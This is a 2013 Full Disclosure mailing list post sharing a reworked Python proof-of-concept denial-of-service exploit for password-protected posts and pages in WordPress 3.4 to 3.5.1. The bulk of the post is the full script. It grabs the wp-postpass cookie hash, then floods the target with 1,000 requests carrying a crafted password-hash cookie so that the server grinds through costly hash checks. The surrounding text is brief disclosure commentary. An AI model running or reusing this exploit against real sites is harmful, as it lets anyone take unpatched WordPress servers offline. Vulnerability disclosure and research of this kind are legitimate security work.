Full Disclosure mailing list archives
WordPress Denial of Service exploit
From: "MustLive" <mustlive () websecurity com ua>
Date: Sat, 29 Jun 2013 23:51:42 +0300
Hello list! Here is my version of vnd's PoC (https://vndh.net/note:wordpress-351-denial-service). This exploit is for Denial of Service vulnerability in WordPress 3.4 - 3.5.1. My version solves some issues in original PoC. Concerning this Denial of Service in WordPress. As I wrote last week in my post concerning release of WordPress 3.5.2, this issue concerns both posts and pages which are password protected. Not only posts as vnd wrote and similarly WP guys wrote at their site (in WP 3.5.2 announcement and in the codex). Since WordPress supports password at both posts and pages, as I wrote in 2010 concerning Brute Force and Insufficient Authorization vulnerabilities in WordPress (http://www.securityfocus.com/archive/1/510274). wordpress-dos.py # WordPress Denial of Service exploit # WordPress 3.4 - 3.5.1 # Author: vnd at vndh.net # Version by MustLive (http://websecurity.com.ua) import httplib import re def get_cookie_hash(hostname, url): headers = {'Content-type': 'application/x-www-form-urlencoded'} handler = httplib.HTTPConnection(hostname) handler.request('POST', url, 'post_password=', headers=headers) response = handler.getresponse() set_cookie = response.getheader('set-cookie') if set_cookie is None: raise RuntimeError('cannot fetch set-cookie header') pattern = re.compile('wp-postpass_([0-9a-f]{32})') result = pattern.search(set_cookie) if result is None: raise RuntimeError('cannot fetch cookie hash') return result.groups()[0] def send_request(hostname, post, cookie_name): headers = {'Cookie': 'wp-postpass_%s=%%24P%%24Spaddding' % cookie_name} handler = httplib.HTTPConnection(hostname) handler.request('GET', post, 'action=postpass&post_password=a', headers=headers) if __name__ == '__main__': hostname = 'site' posturl = '/?p=4' # link to password protected post or page requests = 1000 pattern = re.compile('(.+/)') url = pattern.search(posturl).groups()[0] + 'wp-pass.php' cookie_hash = get_cookie_hash(hostname, url) print '[+] received cookie hash: %s' % cookie_hash for i in xrange(requests): print '[+] sending request %d...' % (i + 1) send_request(hostname, posturl, cookie_hash) Best wishes & regards, MustLive Administrator of Websecurity web sitehttp://websecurity.com.ua
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- WordPress Denial of Service exploit MustLive (Jun 29)